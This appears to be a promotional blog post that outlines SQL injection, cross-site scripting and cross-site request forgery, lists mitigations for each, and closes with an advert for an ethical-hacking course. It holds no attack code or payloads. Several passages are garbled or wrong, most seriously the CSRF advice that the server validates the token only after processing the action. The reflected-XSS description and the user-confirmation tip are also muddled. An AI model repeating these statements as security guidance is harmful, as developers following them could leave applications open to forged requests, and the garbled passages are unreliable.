One of the main things that are needed in the Digital Age to provide services to users is web applications. Of course, web dependency also entails serious risks related to cyber-attacks. SQL injection is one of the measured vulnerabilities that is commonly exploited over cross-site scripting (XSS) and cross-site request forgery (CSRF). Understanding such vulnerabilities, along with proper mitigation strategies, is one way to protect sensitive data and secure web applications.
Through this blog, common web vulnerabilities will be discussed, along with tips on how they may be prevented:
SQL Injection (SQLi)
There is one type of attack called SQL injection wherein an attacker injects a malicious SQL statement to the input fields to gain access or change the contents of a web application database. This means that an attacker could access unauthorised data, leak data or completely take control of the database.
Mitigation Strategies for SQL Injection:
Use Parameterised Queries: Prepared statements with parameterisable queries minimise the opportunity for user input to be considered as executable code.
Input Validation: Validate and sanitise input always and make sure it is in the expected formats.
Limit Database Permissions: Limit the web application’s access to the database to only the operations necessary (for example read only to specific queries).
Use ORM Frameworks: Object Relational Mapping (ORM) frameworks help to abstract SQL queries and much harder to attack the database.
Cross-Site Scripting (XSS)
Causing action in a victim’s browser by injecting scripts across domains not owned by the victim is known as cross site scripting. If this is possible, this could mean that someone could steal cookies or session tokens which could be used for attacks, or any sensitive information at all.
Types of XSS:
Stored XSS: Once infected, the malicious script is stored on the web server for eternity and is run when that infected page is loaded.
Reflected XSS: The web server merely reflects the window into the malicious script and executes it right inside the victim’s browser.
DOM-Based XSS: The attack is made based on DOM environment modification in the client-side browser.
Mitigation Strategies for XSS:
Output Encoding: Make sure that all user content is encoded before it is rendered inside the browser.
Input Validation: Sanitise and validate all user inputs to prevent malicious code from being executed in our environment.
Use Content Security Policy (CSP): However, a strong CSP allows you to define what resources a browser can load and thus prevents them from executing untrusted scripts.
Avoid Inline JavaScript: To minimise inline JavaScript, which makes you vulnerable to XSS attacks, refactor your code.
Cross-Site Request Forgery (CSRF)
Cross-site request forgery is an attack that tricks a validated user into executing unwanted actions on the web application. The forged request, namely changing account details or making unauthorised transactions, is sent from an attacker without the victim’s authorisation.
Mitigation Strategies for CSRF:
Use Anti-CSRF Tokens: Always add a random token to every form or request. Server validates the token only after it processes any action to make sure that this is not fake, and the request indeed came from the legitimate source.
Same-Site Cookies: We can use cookies with the SameSite attribute in order to not send them with cross site requests.
Double Submit Cookies: The client sends back a request containing that token that it just received as a cookie.
Enforce User Confirmation for Critical Actions: If you can avoid it, silent CSRF attacks involve simply changing an account or other state without explicit user confirmation (like entering a password); you should require explicit user confirmation (like re-entering a password) for actions like fund transfers, account changes, etc.
Conclusion
Web applications are on the forefront of cyberattacks and the most significant dangerous threats include SQL Injection, Cross-Site Scripting (XSS) and Cross Site Request Forgery (CSRF). However, these risks can be minimised and their applications protected against malicious attacks by the adoption of high security practices, including input validation, parameterised queries, proper output encoding and anti-CSRF tokens. This is a crucial part of cyber security and ethical hacking, if you want to go deep into this topics and understand the world of ethical hacking, London School of Emerging Technology (LSET) has discussed essential topics and deep learning of Ethical hacking in their course. You can enrol into the course and can get an opportunity into an internship where you can become an industry standard ethical hacker.